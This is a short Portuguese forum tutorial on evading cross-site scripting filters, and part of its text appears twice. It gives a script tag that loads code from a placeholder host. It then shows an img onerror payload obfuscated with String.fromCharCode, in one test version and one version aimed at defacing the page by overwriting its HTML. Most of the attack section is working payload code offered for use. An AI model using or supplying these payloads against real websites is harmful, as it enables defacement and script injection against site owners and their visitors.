Bypass XSS Filters

Bom pessoal , neste topico darei um exemplo como bypassar filtros de xss em aplicações web.

Em uma injeção de código javascript normal utilizamos por exemplo:

Categorias: , , ,

Descrição

Bom pessoal , neste topico darei um exemplo como bypassar filtros de xss em aplicações web.

Em uma injeção de código javascript normal utilizamos por exemplo:

Code: Select all

<script src="http://codigo.xss/code.js"></script>

E este tipo de injeção bem provavelmente sera pega nas aplicacões mais novas.

A forma mais eficiente de burlar os filtros é utilizando uma IMG usando diretiva do Javascript:

Primeiro criamos uma tag <IMG> com erro proposital no SRC:

Code: Select all

<img src=xyz >

Como o “xyz” não é um source valido , ocasionará um erro.

com este erro propositalmente criado, podemos utilizar do evento “onerror” para executar nosso código javascript:
Exemplo para teste :

Code: Select all

<img src=xyz onerror="alert(String.fromCharCode( Sua String em CharCode ))">

Exemplo para deface :

Code: Select all

<img src=xyz onerror="alert(document.documentElement.innerHTML=String.fromCharCode( Seu Html em CharCode ))">

As conversões para CharCode pode ser feitas aqui :

Code: Select all

[url]http://jdstiles.com/java/cct.html[/url]